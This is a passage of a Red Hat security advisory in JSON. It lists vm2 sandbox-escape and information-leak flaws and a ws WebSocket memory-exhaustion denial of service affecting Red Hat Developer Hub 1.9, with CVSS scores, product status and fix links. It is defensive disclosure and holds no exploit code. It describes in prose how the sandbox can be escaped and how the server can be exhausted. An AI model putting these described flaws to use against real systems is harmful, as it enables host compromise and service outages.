"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "vm2: vm2: Arbitrary code execution due to incomplete sandbox restrictions"
},
{
"cve": "CVE-2026-47141",
"cwe": {
"id": "CWE-653",
"name": "Improper Isolation or Compartmentalization"
},
"discovery_date": "2026-06-12T15:01:05.444374+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488379"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. Prior to version 3.11.4, NodeVM, a component of vm2, improperly exposed certain process-wide observability builtins, such as diagnostics_channel, async_hooks, and perf_hooks. These builtins, which are designed for monitoring and debugging, were not adequately blocked by the dangerous builtin denylist. This oversight allowed sandboxed code to observe sensitive host application data, leading to information disclosure across the vm2 security boundary.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vm2: vm2: NodeVM observability builtins leak host process and HTTP request data",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability has been rated as Moderate for Red Hat Developer Hub and Red Hat Ansible Automation Platform. The vm2 sandbox exists as a transitive dependency in Red Hat Developer Hub and is only utilized during build time. The sandbox is therefore not exposed on the production code path. Exploitation of this vulnerability requires attackers to access process-wide observability builtins which is not possible in the default configuration of Red Hat Developer Hub.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-47141"
},
{
"category": "external",
"summary": "RHBZ#2488379",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488379"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-47141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47141"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-47141",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47141"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/commit/e1c48fce05189f48e71efbd32af0754efa4066bb",
"url": "https://github.com/patriksimek/vm2/commit/e1c48fce05189f48e71efbd32af0754efa4066bb"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/security/advisories/GHSA-9g8x-92q2-p28f",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-9g8x-92q2-p28f"
}
],
"release_date": "2026-06-12T14:17:35.970000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vm2: vm2: NodeVM observability builtins leak host process and HTTP request data"
},
{
"cve": "CVE-2026-47208",
"discovery_date": "2026-06-12T15:01:14.630546+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488382"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. This vulnerability allows an attacker to escape the sandbox environment by writing malicious code. Successful exploitation can lead to arbitrary code execution on the host system, compromising the integrity and confidentiality of the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vm2: vm2: Sandbox Breakout Using Promise Species",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation requires an attacker to supply untrusted malicious code to the vm2 sandbox, which is easily achieved since the component\u0027s main purpose is to execute untrusted code.\n\nEscaping the sandbox completely bypasses the intended security boundaries, leading directly to arbitrary code execution on the host system and a full compromise of confidentiality and integrity",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-47208"
},
{
"category": "external",
"summary": "RHBZ#2488382",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488382"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-47208",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47208"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-47208",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47208"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/commit/a462655009669c3124ee39498121651597529ea8",
"url": "https://github.com/patriksimek/vm2/commit/a462655009669c3124ee39498121651597529ea8"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/security/advisories/GHSA-76w7-j9cq-rx2j",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-76w7-j9cq-rx2j"
}
],
"release_date": "2026-06-12T14:16:22.726000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vm2: vm2: Sandbox Breakout Using Promise Species"
},
{
"cve": "CVE-2026-47209",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-06-12T15:02:05.339635+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488397"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in vm2, an open-source virtual machine (VM) sandbox for Node.js. This vulnerability allows an attacker to bypass security restrictions by writing dangerous cross-realm Symbol keys to host objects. This can lead to a compromise of the integrity of the host system, potentially enabling arbitrary code execution within the Node.js environment. The issue stems from the BaseHandler.set trap in bridge.js, which incorrectly writes to the host target object even when inherited property assignments should create an own property on the receiver.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vm2: vm2: Integrity bypass via incorrect property assignment leading to potential arbitrary code execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability has been rated as Moderate for Red Hat Developer Hub and Red Hat Ansible Automation Platform. The vm2 sandbox exists as a transitive dependency in Red Hat Developer Hub and is only utilized during build time. The sandbox is therefore not exposed on the production code path. Exploitation of this vulnerability requires attackers to write cross-realm symbol keys to host objects which is not possible in the default configuration of Red Hat Developer Hub.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-47209"
},
{
"category": "external",
"summary": "RHBZ#2488397",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488397"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-47209",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47209"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-47209",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47209"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/commit/26d0318b5e6555be4b187ba05d6cf378ccecfe22",
"url": "https://github.com/patriksimek/vm2/commit/26d0318b5e6555be4b187ba05d6cf378ccecfe22"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
},
{
"category": "external",
"summary": "https://github.com/patriksimek/vm2/security/advisories/GHSA-c4cf-2hgv-2qv6",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-c4cf-2hgv-2qv6"
}
],
"release_date": "2026-06-12T14:14:06.455000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vm2: vm2: Integrity bypass via incorrect property assignment leading to potential arbitrary code execution"
},
{
"cve": "CVE-2026-48779",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-06-16T22:01:24.571224+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2489661"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ws, an open source WebSocket client and server. A remote attacker can exploit this memory exhaustion vulnerability by sending a high volume of exceptionally small fragments and data chunks. This action forces the affected component to allocate and hold structural wrappers that consume excessive memory. Consequently, this leads to process termination and a denial of service (DoS) for the remote peer.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48779"
},
{
"category": "external",
"summary": "RHBZ#2489661",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2489661"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48779",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48779"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48779",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48779"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7",
"url": "https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53",
"url": "https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94",
"url": "https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8",
"url": "https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8"
},
{
"category": "external",
"summary": "https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p",
"url": "https://github.com/websockets/ws/security/advisories/GHSA-96hv-2xvq-fx4p"
}
],
"release_date": "2026-06-16T21:26:22.537000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ws: ws: Denial of Service via memory exhaustion from small WebSocket fragments"
}
]
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.